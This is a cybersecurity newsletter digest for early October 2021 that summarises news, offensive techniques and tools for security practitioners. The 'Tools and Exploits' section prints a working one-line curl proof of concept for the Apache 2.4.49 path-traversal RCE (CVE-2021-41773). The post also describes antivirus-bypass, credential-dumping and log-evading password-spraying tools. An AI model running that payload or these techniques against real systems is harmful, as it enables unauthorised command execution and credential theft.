Oct 06 2021 Last Week in Security (LWiS) - 2021-10-06

OffensiveRust (@trickster012), persistence via preview panes (@matterpreter + @mutantvillian), decrypting CyberArk (@jelleverg), enumerate uncommon SMB shares (@podalirius_), and more!

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-09-28 to 2021-10-06.

News

Understanding How Facebook Disappeared from the Internet. Facebook had five hours of outage which is $9,806,639 of revenue based on 2020 numbers. A BGP issue took DNS down, and without DNS nothing worked. Bonus points if you have abandoned facebook and facebook owned services so much you didn't really notice. Facebook has issued their own details about the October 4 outage.
Unauthorized Access to Your Coinbase Account. Add this to the list of why SMS two factor is not real two factor, although it isn't clear if Coinbase or mobile carriers were the ultimate culprit. Either way, hardware security tokens are the answer.
Company That Routes Billions of Text Messages Quietly Says It Was Hacked. Don your tin foil hat and conjecture if this is related to the previous story - probably not, this feels like good old fashion espionage.
Introducing the Secure Open Source Pilot Program. Bug bounty for preventative security improvements is a great idea, but the ambiguity of the categories is even worse than normal bug bounty. Good luck to whomever has to "triage" these reports, but kudos to Google for trying something.
Twitch Hack of 135 GB of Data Includes How Much Its Biggest Streamers Make. There are 6,000+ git repos as well. An interesting look behind the curtain of a major tech company.
Unicorn2. Unicorn, the popular CPU emulation framework is over 6 years old now and the second major version has been build from scratch on top of Qemu 5. It also adds PowerPC and RISCV emulation.

Techniques

Life is Pane: Persistence via Preview Handlers. Windows explorer previews are generated by DLLs that are registered for each file extension. Attackers can register their own handlers or take over existing extensions for persistence when a user opens an explorer window containing a file with that extension. This is sneaky, and probably not detected by many EDR vendors... yet.
Cisco Hyperflex: How We Got RCE Through Login Form and Other Findings. The auth endpoint calculated the password hash of the plaintext supplied by the user by calling a one line python script from Go and passing the plaintext as an argument. Why not calculate the hash in the Go binary? Less RCE that way I suppose...
Crucial’s MOD Utility LPE – CVE-2021-41285. More "gaming" drivers, more LPEs. If you need system, target gaming drivers!
Reverse engineering and decrypting CyberArk vault credential files. This post is a technical deep-dive into CyberArk credential files and how the credentials stored in these files are encrypted and decrypted. The author discovered it was possible to reverse engineer the encryption and key generation algorithms and decrypt the encrypted vault password
Abusing Weak ACL on Certificate Templates. This is a walkthrough of the ESC4 attack described in Certified Pre-Owned.
Single Step Encryption/Decryption. Decrypt and run shellcode one instruction (or 16 byte block) at a time. This should help against memory forensics, but may be unstable with complex shellcode.

Tools and Exploits

OffensiveRust is a series of experiments in weaponizing Rust for implant development and general offensive operations.
Apache HTTP Server 2.4 vulnerabilities. This is a path traversal vulnerability that can lead to RCE. PoC: curl --data "A=|id>>/tmp/x;uname$IFS-a>>/tmp/x" 'http://[IP]:[PORT]/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv (credit to @hackerfantastic). Note that this only affects 2.4.49 (released 2021-09-15) due to this commit from August 2021. Test it out in the CVE-2021-41773 Playground.
DCOM_AV_EXEC allows for "diskless" lateral movement to a target on the same network via DCOM. The AV_Bypass_Framework_V3 creates a .NET shellcode runner (output as DLL) which can be used with the DCOM_AV_EXEC tool to bypass antivirus solutions like Microsoft Defender as all shellcode is AES encrypted and executed in memory.
kenzer performs automated web assets enumeration & scanning.
PHP 7.0-8.0 disable_functions bypass [user_filter] is a 10 year old bug to get around disabled_functions set in php.ini and execute shell commands on the target webserver.
DonPAPI dumps DPAPI credentials remotely.
aad-sso-enum-brute-spray A PoC for the vulnerability that would, in theory, allow one to perform brute force or password spraying attacks against one or more AAD accounts without causing account lockout or generating log data, thereby making the attack invisible.

-FindUncommonShares is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 which finds uncommon SMB shares on remote machines.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

shottr is a great screenshot tool for macOS. It can do on-device text extraction, blurring, measurements, cropping, etc. The only outbound network traffic is to google analytics (unlike some other screenshot apps).

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.